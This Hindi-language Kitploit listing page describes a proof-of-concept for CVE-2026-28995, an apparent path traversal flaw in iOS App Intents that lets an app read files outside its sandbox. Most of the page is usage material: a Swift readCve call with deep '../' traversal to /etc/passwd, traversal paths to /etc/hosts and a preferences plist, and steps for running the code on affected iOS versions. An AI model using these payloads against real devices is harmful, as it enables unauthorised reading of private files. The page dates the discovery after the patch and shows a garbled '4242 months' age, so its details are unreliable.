Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-28995 — # CVE-2026-28995 CVE-2026-28995 के लिए प्रूफ ऑफ कॉन्सेप्ट — iOS 26.4.2 और उससे नीचे के App Intents में पाथ ट्रैवर्सल भेद्यता। | Kitploit
उपकरण/GitHubGitHub/robertmak2014-sudow/cve-2026-28995
आईओएस सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षा
GitHubrobertmak2014-sudow/cve-2026-28995

CVE-2026-28995

# CVE-2026-28995 CVE-2026-28995 के लिए प्रूफ ऑफ कॉन्सेप्ट — iOS 26.4.2 और उससे नीचे के App Intents में पाथ ट्रैवर्सल भेद्यता।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
4242 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-28995

CVE-2026-28995 के लिए प्रूफ ऑफ कॉन्सेप्ट — iOS 26.4.2 और उससे नीचे के App Intents में पथ ट्रैवर्सल भेद्यता।

विवरण

यह भेद्यता एक दुर्भावनापूर्ण ऐप को App Intents के माध्यम से अपने सैंडबॉक्स के बाहर किसी भी फ़ाइल को पढ़ने की अनुमति देती है। इसका मूल कारण Apple के App Intents फ्रेमवर्क में अपर्याप्त पथ सत्यापन है।

प्रभावित संस्करण: iOS 26.4.2 और उससे नीचे
पैच किया गया: iOS 26.5 (11 मई, 2026)

उपयोग

1. फ़ंक्शन readCve(path: String) -> String

root@kitploit:~
let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)

2. पथ उदाहरण

पथपढ़ता है
../../../../../../../../../../../../../etc/passwdउपयोगकर्ता पासवर्ड
../../../../../../../../../../../../../etc/hostsहोस्ट फ़ाइल
../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plistसिस्टम प्राथमिकताएँ

3. निर्देशिका संभालना

यदि पथ किसी निर्देशिका की ओर इशारा करता है, तो फ़ंक्शन लौटाता है:

root@kitploit:~
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/

कैसे चलाएँ

  1. Xcode में एक iOS प्रोजेक्ट बनाएँ।
  2. प्रोजेक्ट में CVE-2026-28995.swift जोड़ें।
  3. लक्ष्य पथ के साथ readCve(path:) को कॉल करें।
  4. iOS 26.4.2 या उससे पहले के संस्करण पर चलाएँ।

जिम्मेदार प्रकटीकरण

खोजा गया: 1 जुलाई, 2026
पैच किया गया: iOS 26.5 (11 मई, 2026)

टूल डाउनलोड करें